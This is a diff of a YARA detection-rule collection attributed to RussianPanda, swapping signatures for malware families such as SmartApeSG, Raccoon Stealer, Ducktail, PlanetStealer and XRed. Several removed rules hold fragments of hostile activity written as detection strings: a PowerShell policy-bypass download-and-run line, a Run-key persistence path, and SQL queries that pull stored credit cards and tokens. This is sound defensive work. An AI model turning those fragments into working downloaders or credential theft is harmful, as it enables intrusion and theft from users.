@@ -168420,802 +168455,801 @@ rule RUSSIANPANDA_Easycrypter : FILE
 	condition:
 		uint16( 0 ) == 0x5A4D and $s1 and $s2
 }
-rule RUSSIANPANDA_Smartapesg_JS_Netsupportrat_Stage2 : FILE
+rule RUSSIANPANDA_Win_Mal_Matanbuchus_Loader : FILE
 {
 	meta:
-		description = "Detects SmartApeSG JavaScript Stage 2 retrieving NetSupportRAT"
+		description = "Detects Matanbuchus 3.0 Loader component"
 		author = "RussianPanda"
-		id = "2a614e11-be32-5bf1-9fd1-da224f0a644e"
-		date = "2024-01-11"
-		modified = "2024-01-12"
+		id = "3a7a22b3-a1aa-59d8-b947-99a2ea192a6b"
+		date = "2025-02-15"
+		modified = "2026-02-16"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/SmartApeSG/SmartApeSG_JS_NetSupportRAT_stage2.yar#L1-L23"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Matanbuchus/win_mal_Matanbuchus_loader.yar#L1-L15"
 		license_url = "N/A"
-		hash = "67d8f84b37732cf85e05b327ad6b6a9f"
-		logic_hash = "5a2afaa14d513e0a3c4e52acfb433e53a4541983a05d15318a217c14dc06453c"
+		hash = "ec29bcda7d42d812aebd2ee5be6e43256bcf6095b9fc36f92eec5d6475dd5e1f"
+		logic_hash = "a9497b30283d932c134a4bf8f965ce1bd3d590f8dec53cb65fa418a152f67581"
 		score = 75
-		quality = 85
+		quality = 81
 		tags = "FILE"
 
 	strings:
-		$x1 = "powershell.exe -Ex Bypass -NoP -C $"
-		$x2 = "Get-Random -Minimum -1000 -Maximum 1000"
-		$s1 = "HKCU:\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"
-		$s2 = "=new ActiveXObject('W"
-		$s3 = "System.Net.WebClient).DownloadString($"
-		$s4 = "FromBase64String"
-		$s5 = "Start-Process -FilePath $"
+		$s1 = {FF E0 F5 05 EB 0F}
+		$s2 = {65 78 70 61}
+		$s3 = {6E 64 20 33}
+		$s4 = {66 89 ?? ?? ?? ?? 00 00 00 66 89 ?? ?? ?? ?? 00 00 00 66 89}
+		$s5 = {E8 00 00 00 00 83 04 24 05 CB}
 
 	condition:
-		filesize < 1MB and ( ( 1 of ( $x* ) and 3 of them ) or 5 of them )
+		uint16( 0 ) == 0x5A4D and 4 of them and filesize < 250KB
 }
-rule RUSSIANPANDA_Smartapesg_JS_Dropper_Stage1 : FILE
+
+rule RUSSIANPANDA_Ducktail_Mainbot : FILE
 {
 	meta:
-		description = "Detects SmartApeSG initial JavaScript file"
+		description = "Detects Ducktail mainbot"
 		author = "RussianPanda"
-		id = "9513f323-c315-5ae2-92a5-c831d0a7ce2a"
-		date = "2024-01-11"
-		modified = "2024-01-11"
-		reference = "https://medium.com/walmartglobaltech/smartapesg-4605157a5b80"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/SmartApeSG/SmartApeSG_JS_dropper_stage1.yar#L1-L18"
+		id = "f280903f-13d3-54e1-8308-781e3f777d13"
+		date = "2023-12-24"
+		modified = "2023-12-26"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Ducktail/ducktail_mainbot-12-2023.yar#L3-L19"
 		license_url = "N/A"
-		hash = "8769d9ebcf14b24a657532cd96f9520f54aa0e799399d840285311dfebe3fb15"
-		logic_hash = "de7e4ec30c780699b46de7baf2a916fdb7331da2ee7c2d637422ea664cd03b82"
+		logic_hash = "33b85c6e1e1137aeeb07eba957b73d738a70ddc561b42bd2d39258e90280fca4"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$a1 = "'GE'+'T'"
-		$a2 = "'GE','T'"
-		$s1 = "pt.Creat"
-		$s2 = "L2.ServerX"
-		$s3 = "ponseText"
-		$s4 = "MLHTTP.6.0"
-		$s5 = /\/news\.php\?([0-9]|[1-9][0-9]|100)/
+		$s1 = {2F 00 61 00 70 00 69 00 2F 00 63 00 68 00 65 00 63 00 6B}
+		$s2 = {62 00 65 00 67 00 69 00 6E 00 20 00 63 00 6F 00 6E 00 6E 00 65 00 63 00 74}
+		$s3 = {62 00 65 00 67 00 69 00 6E 00 20 00 66 00 6C 00 75 00 73 00 68 00 20 00 64 00 6E 00 73}
+		$s4 = {62 00 65 00 67 00 69 00 6E 00 20 00 73 00 65 00 6E 00 64 00 69 00 6E 00 67}
 
 	condition:
-		all of ( $s* ) and filesize < 1MB and any of ( $a* )
+		all of ( $s* ) and filesize < 12MB and pe.exports ( "DotNetRuntimeDebugHeader" )
 }
-rule RUSSIANPANDA_Win_Mal_Astarionrat : FILE
+
+rule RUSSIANPANDA_Ducktail_Myrdpservice_Bot : FILE
 {
 	meta:
-		description = "Detects AstarionRAT"
+		description = "Detects Ducktail myRdpService bot"
 		author = "RussianPanda"
-		id = "70588745-761a-5b74-a612-7affde300b09"
-		date = "2025-02-14"
-		modified = "2026-02-14"
+		id = "50786786-a7db-5290-a363-6fda139a0343"
+		date = "2023-12-24"
+		modified = "2023-12-26"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/AstarionRAT/win_mal_AstarionRAT.yar#L1-L13"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Ducktail/ducktail_myrdpservice-12-2023.yar#L3-L17"
 		license_url = "N/A"
-		hash = "a508d0bb583dc6e5f97b6094f8f910b5b6f2b9d5528c04e4dee62c343fce6f4b"
-		logic_hash = "ea8050f9127fdbc70b3e8f390bb557b9ac39045e98a1998f11363016d17c3164"
+		logic_hash = "a329067fbb2acc34c4970167bbce0706c5a3ec09ee89ce16817c105ae1c17b1b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = "s5://%s:%s@%s:%d"
-		$s2 = "Failed to connect to the server"
-		$s3 = "Impersonated"
+		$s1 = {43 00 3A 00 5C 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 64 00 65 00 76 00 69 00 63 00 65 00 49 00 64 00 2E 00 74 00 78 00 74}
+		$s2 = {6C 00 6F 00 67 00 5F 00 72 00 64 00 70 00 2A}
+		$s3 = {00 43 00 6F 00 6E 00 6E 00 65 00 63 00 74 00 65 00 64 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		all of ( $s* ) and filesize < 12MB and pe.exports ( "DotNetRuntimeDebugHeader" )
 }
-rule RUSSIANPANDA_Darkgate_Autoit
+rule RUSSIANPANDA_Ducktail : FILE
 {
 	meta:
-		description = "Detects DarkGate AutoIT script"
+		description = "Ducktail Infostealer"
 		author = "RussianPanda"
-		id = "b30544b5-88c9-5a84-8582-f4f72b228f24"
-		date = "2024-01-26"
-		modified = "2024-01-26"
-		reference = "https://yara.readthedocs.io/en/stable/writingrules.html?highlight=xor"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/DarkGate/darkgate_autoit.yar#L1-L19"
+		id = "14ba165f-a1f3-5820-a6d8-e2b6ab2fbb51"
+		date = "2023-04-25"
+		modified = "2023-05-05"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Ducktail/ducktail.yar#L1-L16"
 		license_url = "N/A"
-		hash = "e1803b01e3f187355dbeb87a0c91b76c"
-		logic_hash = "dda6726d09035d6f61ca331d18ed37f032c6f6a5ab88e1754a21587f4c79ac87"
+		logic_hash = "cb248870f6945d7a6d60d54944dc726d40ba326448af39b87325ec56445602a5"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 73
+		tags = "FILE"
 
 	strings:
-		$h = "AU3!EA06"
-		$s1 = "just_test.txt" xor(0x01-0xff)
-		$s2 = "c:\\temp\\data.txt" xor(0x01-0xff)
-		$s3 = "test.txt" xor(0x01-0xff)
-		$s4 = "cc.txt" xor(0x01-0xff)
-		$s5 = "c:\\temp\\data.txt" xor(0x01-0xff)
-		$s6 = "uu.txt" xor(0x01-0xff)
+		$s = {65 5f 73 71 6c 69 74 65 33 2e 64 6c 6c}
+		$s1 = {54 65 6c 65 67 72 61 6d 2e 42 6f 74 2e 64 6c 6c}
+		$s2 = {4e 65 77 74 6f 6e 73 6f 66 74 2e 4a 73 6f 6e 2e 64 6c 6c}
+		$s3 = {42 6f 75 6e 63 79 43 61 73 74 6c 65 2e 43 72 79 70 74 6f 2e 64 6c 6c}
+		$s4 = {53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 53 6f 63 6b 65 74 73 2e 43 6c 69 65 6e 74 2e 64 6c 6c}
+		$s5 = {53 79 73 74 65 6d 2e 4e 65 74 2e 4d 61 69 6c 2e 64 6c 6c}
 
 	condition:
-		3 of ( $s* ) and $h
+		all of them and filesize > 60MB
 }
-rule RUSSIANPANDA_Mal_Narniarat : FILE
+rule RUSSIANPANDA_Win_Mal_Planetstealer : FILE
 {
 	meta:
-		description = "Detects NarniaRAT from BotnetFenix campaign"
+		description = "Detects PlanetStealer"
 		author = "RussianPanda"
-		id = "64c3a44b-5d75-5fec-bfc1-b66a5eb5780c"
-		date = "2024-02-02"
-		modified = "2024-02-02"
+		id = "f912066f-4151-5f83-8d34-6bffdf9e25e5"
+		date = "2024-03-04"
+		modified = "2024-03-24"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/NarniaRAT/mal_NarniaRAT.yar#L1-L16"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/PlanetStealer/win_mal_PlanetStealer.yar#L1-L14"
 		license_url = "N/A"
-		hash = "43f6c3f92a025d12de4c4f14afa5d098"
-		logic_hash = "3ee8bf6b3970c6f56ca98c87752050217e350da160a650e1724b19f340bf0230"
+		logic_hash = "e1660d6fed4c48b45b40bd51fb52254c5b19ca6f1938b68f2344bde473820b86"
 		score = 75
-		quality = 85
+		quality = 79
 		tags = "FILE"
 
 	strings:
-		$s1 = "client-remote desktop"
-		$s2 = "SendDataToServer"
-		$s3 = "SendRunningApps"
-		$s4 = "SendDataToServer"
-		$s5 = "SendKeys"
-		$s6 = "_CorExeMain"
+		$s1 = {48 8D 15 ?? ?? ?? 00 0F B6 34 10 0F B6 BC 04 ?? ?? 00 00 ?? ?? 40 88 ?? 04 ?? ?? 00 00 48 FF C0}
+		$s2 = {48 83 F8 ?? 7C DA}
+		$s3 = {72 75 6E 74 69 6D 65 2E 67 6F 62 75 66}
+		$s4 = {74 6F 74 61 6C 5F 77 61 6C 6C 65 74 73}
+		$s5 = {74 6F 74 61 6C 5F 63 6F 6F 6B 69 65 73}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 5 of them
+		uint16( 0 ) == 0x5A4D and all of them and #s2 > 100 and #s1 > 100 and filesize < 20MB
 }
-rule RUSSIANPANDA_Johnwalkertexasloader : FILE
+rule RUSSIANPANDA_Mal_Cleanuploader : FILE
 {
 	meta:
-		description = "Detects JohnWalkerTexasLoader (JWTL)"
+		description = "Detects CleanUpLoader"
 		author = "RussianPanda"
-		id = "af91ab47-245b-58f2-a35a-1cb408b2229a"
-		date = "2024-10-10"
-		modified = "2024-10-10"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/JWTL/JohnWalkerTexasLoader.yar#L1-L16"
+		id = "fc75fed2-0f8c-55c9-bd10-efe95a678f31"
+		date = "2024-02-14"
+		modified = "2024-02-14"
+		reference = "https://x.com/AnFam17/status/1757871703282077857?s=20"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/CleanUpLoader/mal_cleanuploader.yar#L1-L14"
 		license_url = "N/A"
-		hash = "3784fc39dc5c0dec08ad0a49bbbb990359e313a9fa87e6842fd67ed7cc1c0baa"
-		logic_hash = "414be3219d12823639d140d132a9bbc2ca7bf8c44d0c560e4a49b76323be3f8a"
+		hash = "2b62dd154b431d8309002d5b4a35de07"
+		logic_hash = "a9267c568c11420e36f0781469aa7d932c87d52707981912558eb0f4f84f673a"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 
 	strings:
-		$s1 = "?status=1&wallets=" ascii wide
-		$s2 = "/api.php" ascii wide
-		$s3 = "/api-debug.php" ascii wide
+		$s1 = {0F B6 80 30 82 42 00 88}
+		$s2 = {44 69 73 6B 43 6C 72}
+		$s3 = {49 00 6E 00 73 00 74 00 61 00 6C 00 6C 00 20 00 45 00 64 00 67 00 65}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and all of them and #s1 > 15
 }
-rule RUSSIANPANDA_Johnwalkertexasloader_V2 : FILE
+rule RUSSIANPANDA_PSWSTEALER : FILE
 {
 	meta:
-		description = "Detects JohnWalkerTexasLoader (JWTL)"
+		description = "PSWSTEALER"
 		author = "RussianPanda"
-		id = "1a05245e-5ee0-5916-801b-4f7f3a573e71"
-		date = "2024-10-15"
-		modified = "2024-10-15"
+		id = "8a596074-ffe3-5979-b384-487ebe8b953c"
+		date = "2023-04-02"
+		modified = "2023-05-05"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/JWTL/JohnWalkerTexasLoader_v2.yar#L1-L16"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/PSWSTEALER/pswstealer.yar#L1-L14"
 		license_url = "N/A"
-		hash = "9f6bf0473f5541d84faad4c33a0bc5b1928fceb5938f2d6a7e6e02b7f0980341"
-		logic_hash = "70cbf6cf0602dc8087f4845451d13d0043872733615050161c077e3346387873"
+		logic_hash = "7d85b0ccaa07419f22b9f38a4bc66435cd689b21fa7e4584ef8bea485b6bd2c1"
 		score = 75
-		quality = 81
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {61 00 48 00 52 00 30 00 63 00 48 00 4D 00 36 00 4C 00 79 00 39}
-		$s2 = {73 65 6E 64 6F 70 65 6E 31}
-		$s3 = {73 65 6E 64 6F 70 65 6E 32}
+		$obf = {09 20 FF [3] 5F 06 25 17 58 0A 61 1E 62 09 1E 63 06 25 17 58 0A 61 D2 60 D1 9D}
+		$obf1 = {09 06 08 59 61 D2 13 04 09 1E 63 08 61 D2 13 05 07 08 11 05 1E 62 11 04 60 D1 9D 08 17 58 0C}
+		$enc = {73 ?? 00 00 0A 73 ?? 00 00 0A}
+		$s = {73 ?? 00 00 0A 0C 08 6F ?? 00 00 0A}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		all of them and filesize < 200KB
 }
-rule RUSSIANPANDA_Raccoonstealer : FILE
+rule RUSSIANPANDA_Neptune_Loader : FILE
 {
 	meta:
-		description = "Detects Raccoon Stealer v2.3.1.1"
+		description = "Detects Neptune Loader"
 		author = "RussianPanda"
-		id = "29f28cd5-370b-5831-8b71-a253f468f7e4"
-		date = "2024-01-08"
-		modified = "2024-01-08"
-		reference = "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-raccoon-stealer-v2-0"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/RaccoonStealer_v2/raccoonstealer_v2.3.1.1.yar#L1-L20"
+		id = "d576bf47-10bd-55d0-99b0-69c02dc87f17"
+		date = "2024-01-17"
+		modified = "2024-01-21"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/NeptuneLoader/neptune_loader.yar#L1-L18"
 		license_url = "N/A"
-		hash = "c6d0d98dd43822fe12a1d785df4e391db3c92846b0473b54762fbb929de6f5cb"
-		logic_hash = "ee2b39c1c2068b97e63a03330a2f9e2f12e53aaf9cfffb274acde2372a11fe45"
+		logic_hash = "ca54b8a624d48aa28bc727420f25e6f0fd67b193ac79443a357d88a9fe7cbdbb"
 		score = 75
-		quality = 85
+		quality = 81
 		tags = "FILE"
 
 	strings:
-		$s1 = {8B 0D [2] 41 00 A3 [3] 00}
-		$s2 = "MachineGuid"
-		$s3 = "SELECT name_on_card, card_number_encrypted, expiration_month, expiration_year FROM credit_cards"
-		$s4 = "SELECT service, encrypted_token FROM token_service"
-		$s5 = "&configId="
-		$s6 = "machineId="
+		$s1 = {8B C6 E8 F4 FB FF FF}
+		$s2 = {66 33 D1 66 89 54 58 FE}
+		$s3 = {7C 53 74 61 72 74 75 70 46 6F 6C 64 65 72 7C}
+		$s4 = {44 65 6C 70 68 69}
+		$t1 = {C7 [3] 0B 40 40 00 [6] A1 ?? 61 40 00}
+		$t2 = {C7 ?? 24 00 40 40 00 A1 ?? 61 40 00}
+		$t3 = {8B ?? ?? FF D0 B8}
 
 	condition:
-		all of ( $s* ) and #s1 > 10 and uint16( 0 ) == 0x5A4D and filesize < 5MB
+		uint16( 0 ) == 0x5A4D and 3 of ( $s* ) or 2 of ( $t* ) and filesize < 6MB
 }
-rule RUSSIANPANDA_Raccoonstealerv2 : FILE
+rule RUSSIANPANDA_Win_Mal_Rustydropper : FILE
 {
 	meta:
-		description = "Detects the latest unpacked/unobfuscated build 2.1.0-4"
+		description = "Detects RustyDropper"
 		author = "RussianPanda"
-		id = "eda6216a-219b-5f60-8084-4c0c240a4cb4"
-		date = "2023-04-17"
-		modified = "2023-05-05"
+		id = "9f217080-81e0-547a-9336-cf8ac2fadf36"
+		date = "2024-03-01"
+		modified = "2024-03-01"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/RaccoonStealer_v2/raccoonstealerv2_2.1.0-4_build.yar#L1-L14"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/RustyDropper/win_mal_RustyDropper.yar#L1-L12"
 		license_url = "N/A"
-		logic_hash = "e2226f08753a3571045953363c04ec52de3c79cd0cd29e7ecb6afaf2ad573e4e"
-		score = 50
-		quality = 85
+		hash = "a3a5e7011335a2284e2d4f73fd464ff129f0c9276878a054c1932bc50608584b"
+		logic_hash = "d0c76bcd1af63cc1b1fbabc3fa33e6caafd7d9c7c3780a94a1ed37eadef655d7"
+		score = 75
+		quality = 81
 		tags = "FILE"
 
 	strings:
-		$pattern1 = {B9 ?? ?? ?? 00 E8 ?? ?? ?? 00 ?? ?? 89 45 E8}
-		$pattern2 = {68 ?? ?? ?? 00 ?? 68 01 00 1F 00}
-		$pattern3 = {68 ?? ?? ?? 00 ?? ?? 68 01 00 1F 00 FF 15 64 ?? ?? 00}
-		$m1 = {68 ?? ?? ?? 00 ?? 00 68 01 00 1f 00 ff 15 64 ?? ?? 00}
-		$m2 = {68 ?? ?? ?? 00 ?? 68 01 00 1f 00 ff 15 64 ?? ?? 00}
+		$s1 = {47 3a 5c 52 55 53 54 5f 44 52 4f 50 50 45 52 5f 45 58 45 5f 50 41 59 4c 4f 41 44 5c 44 52 4f 50 50 45 52 5f 4d 41 49 4e 5c}
+		$s2 = {46 45 41 54 55 52 45 5f 42 52 4f 57 53 45 52 5f 45 4d 55 4c 41 54 49 4f 4e}
 
 	condition:
-		2 of ( $pattern* ) and uint16( 0 ) == 0x5A4D and 1 of ( $m* ) and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 200KB
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule RUSSIANPANDA_PSWSTEALER : FILE
+rule RUSSIANPANDA_Jinxloader : FILE
 {
 	meta:
-		description = "PSWSTEALER"
+		description = "Detects JinxLoader Golang version"
 		author = "RussianPanda"
-		id = "8a596074-ffe3-5979-b384-487ebe8b953c"
-		date = "2023-04-02"
-		modified = "2023-05-05"
+		id = "25570c99-5938-5be0-a153-a07be0d0571c"
+		date = "2024-01-02"
+		modified = "2024-01-02"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/PSWSTEALER/pswstealer.yar#L1-L14"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/JinxLoader/JinxLoader-1-2-2024.yar#L1-L16"
 		license_url = "N/A"
-		logic_hash = "7d85b0ccaa07419f22b9f38a4bc66435cd689b21fa7e4584ef8bea485b6bd2c1"
+		hash = "6bd7ff5d764214f239af2bb58b368308c2d04f1147678c2f638f37a893995f71"
+		logic_hash = "13dee435fb4d40c629c0a30b6f655b87f14b10a6f6acf61d00e6c692c9bb0ff1"
 		score = 75
-		quality = 85
+		quality = 81
 		tags = "FILE"
 
 	strings:
-		$obf = {09 20 FF [3] 5F 06 25 17 58 0A 61 1E 62 09 1E 63 06 25 17 58 0A 61 D2 60 D1 9D}
-		$obf1 = {09 06 08 59 61 D2 13 04 09 1E 63 08 61 D2 13 05 07 08 11 05 1E 62 11 04 60 D1 9D 08 17 58 0C}
-		$enc = {73 ?? 00 00 0A 73 ?? 00 00 0A}
-		$s = {73 ?? 00 00 0A 0C 08 6F ?? 00 00 0A}
+		$s1 = {72 75 6E 74 69 6D 65 2E 67 6F 70 61 6E 69 63}
+		$s2 = {48 8D 05 4D 6E 07 00 BB 0A 00 00 00}
+		$s3 = {73 65 6C 66 5F 64 65 73 74 72 75 63 74 2E 62 61 74}
+		$s4 = {48 8D 1D B7 24 08 00 [25] E8 EF FC E4 FF}
 
 	condition:
-		all of them and filesize < 200KB
+		uint16( 0 ) == 0x5A4D and all of ( $s* ) and filesize < 9MB
 }
-rule RUSSIANPANDA_Win_Mal_Xworm : FILE
+
+rule RUSSIANPANDA_Illyrianstealer : FILE
 {
 	meta:
-		description = "Detects XWorm RAT"
+		description = "Detects Illyrian Stealer"
 		author = "RussianPanda"
-		id = "5701f382-3c97-5a00-9673-6c39b0f11cc2"
-		date = "2024-03-11"
-		modified = "2024-03-11"
+		id = "2f85e87c-6883-5f41-a37c-00f9e93f61bf"
+		date = "2024-01-08"
+		modified = "2024-01-08"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/XWorm/win_mal_XWorm.yar#L1-L15"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/IllyrianStealer/illyrian_stealer.yar#L2-L18"
 		license_url = "N/A"
-		hash = "fc422800144383ef6e2e0eee37e7d6ba"
-		logic_hash = "c42544285517dc61628e8df2ee5ab6733924fbb2cc08b9b2df273eec0a401d90"
+		hash = "fae0aed6173804e8c22027cbb0c121eedd927f16ea7e2b23662dbe6e016980e8"
+		logic_hash = "2012d401d3e7ce2d4d6ea12ed01a30b7d3e18f4ed47dbf70d43bae6c328960ea"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {4D 00 6F 00 64 00 69 00 66 00 69 00 65 00 64 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 66 00 75 00 6C 00 6C 00 79 00 21}
-		$s2 = {50 00 6C 00 75 00 67 00 69 00 6E 00 73 00 20 00 52 00 65 00 6D 00 6F 00 76 00 65 00 64 00 21}
-		$s3 = {73 00 65 00 6E 00 64 00 50 00 6C 00 75 00 67 00 69 00 6E}
-		$s4 = {4D 00 6F 00 64 00 69 00 66 00 69 00 65 00 64 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 66 00 75 00 6C 00 6C 00 79 00 21}
-		$s5 = "_CorExeMain"
+		$s1 = "get_TotalPhysicalMemory"
+		$s2 = "\\b(bitcoincash)[a-zA-HJ-NP-Z0-9]{36,54}\\b" wide
+		$s3 = "[Crypto]" wide
+		$s4 = "|Black|" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		all of ( $s* ) and filesize < 50KB and pe.imports ( "mscoree.dll" )
 }
-rule RUSSIANPANDA_Win_Mal_Mmgrabber : FILE
+rule RUSSIANPANDA_Prysmax_Stealer : FILE
 {
 	meta:
-		description = "Detects mmgrabber Plugin"
+		description = "Detects Prysmax Stealer"
 		author = "RussianPanda"
-		id = "9d16282e-0cf3-527c-89df-51ae0d156e70"
-		date = "2025-02-13"
-		modified = "2025-02-14"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/UNC4108/win_mal_mmgrabber.yar#L1-L14"
+		id = "97ab92b8-1771-5881-9cd1-d8ff76b8f380"
+		date = "2024-01-09"
+		modified = "2024-01-10"
+		reference = "https://www.cyfirma.com/outofband/new-maas-prysmax-launches-fully-undetectable-infostealer/"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Prysmax Stealer/prysmax_stealer.yar#L1-L21"
 		license_url = "N/A"
-		hash = "40ebd719aa66a88e261633887ed4e2c144bd11fbcc6f7793f9b32652cc5bf2d3"
-		logic_hash = "149c81b3c1a33933da0c181b8e8a90f40ba5fd8961d6340470790eb375c9695b"
+		logic_hash = "869eee7dd5209bdea98c248791b9ac911e3daabe6d440aa62aecefa43539a41c"
 		score = 75
-		quality = 85
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$s1 = "GrabDesktopWallets"
-		$s2 = "GrabChromeExtensions"
-		$s3 = "FindExodusFolder"
-		$s4 = "mscoree.dll"
+		$a1 = {23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23}
+		$s2 = {73 70 72 79 73 6D 61 78}
+		$s3 = {56 43 52 55 4E 54 49 4D 45 31 34 30 2E 64 6C 6C}
+		$s4 = {56 43 52 55 4E 54 49 4D 45 31 34 30 5F 31 2E 64 6C 6C}
+		$s5 = {4D 53 56 43 50 31 34 30 2E 64 6C 6C}
+		$s6 = {50 79 49 6E 73 74 61 6C 6C 65 72}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		all of ( $s* ) and uint16( 0 ) == 0x5A4D and $a1 in ( 9600000 .. filesize ) and #a1 > 600 and filesize > 60MB and filesize < 200MB
 }
-rule RUSSIANPANDA_Win_Mal_Formgrabber : FILE
+rule RUSSIANPANDA_Mal_Xred_Backdoor : FILE
 {
 	meta:
-		description = "Detects Formgrabber Plugin"
+		description = "Detects XRed backdoor"
 		author = "RussianPanda"
-		id = "818405a9-4348-5c4a-a4d1-e35b4f525e25"
-		date = "2025-02-13"
-		modified = "2025-02-14"
+		id = "61f5fcb8-9351-5db0-8bce-123c96d2a443"
+		date = "2024-02-09"
+		modified = "2024-02-09"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/UNC4108/win_mal_Formgrabber.yar#L1-L14"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/XRed_Backdoor/mal_xred_backdoor.yar#L1-L18"
 		license_url = "N/A"
-		hash = "33ea72b46af7bb2ecc0775f7536d3259f34bd7a13e298cac66649ee694097c2e"
-		logic_hash = "649e2a5b018b79d3d8534baf8432924f7ee197f26aebbfd384dd613c31d1b035"
+		hash = "9e1fbae3a659899dde8db18a32daa46a"
+		logic_hash = "36d138a0efade1d5c075662dc528235fe66b49879730db78c4c7290fec7420b5"
 		score = 75
-		quality = 85
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$s1 = "frmgrb"
-		$s2 = "WebfakeRecords"
-		$s3 = "urlblocklist"
-		$s4 = "mscoree.dll"
+		$s1 = {4B 65 79 62 6F 61 72 64 20 48 6F 6F 6B 20 2D 3E 20 41 63 74 69 76 65}
+		$s2 = {54 43 50 20 43 6C 69 65 6E 74 20 2D 3E 20 41 6B 74 69 66}
+		$s3 = {55 53 42 20 48 6F 6F 6B 73 20 2D 3E 20 41 63 74 69 76 65}
+		$s4 = {45 58 45 55 52 4C 31}
+		$s5 = {49 4E 49 55 52 4C 33}
+		$s6 = {58 52 65 64 35 37}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and 3 of them
 }
-rule RUSSIANPANDA_Win_Mal_Pregrabber : FILE
+rule RUSSIANPANDA_Win_Mal_Stealc_V2 : FILE
 {
 	meta:
-		description = "Detects Pregrabber Plugin"
+		description = "Detects StealC v2"
 		author = "RussianPanda"
-		id = "a7e5bf1d-b25e-5c46-b191-ee7de13b24e5"
-		date = "2025-02-13"
-		modified = "2025-02-14"
+		id = "052f4556-ddba-5187-8dcb-138f02bc4c36"
+		date = "2025-04-10"
+		modified = "2025-04-10"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
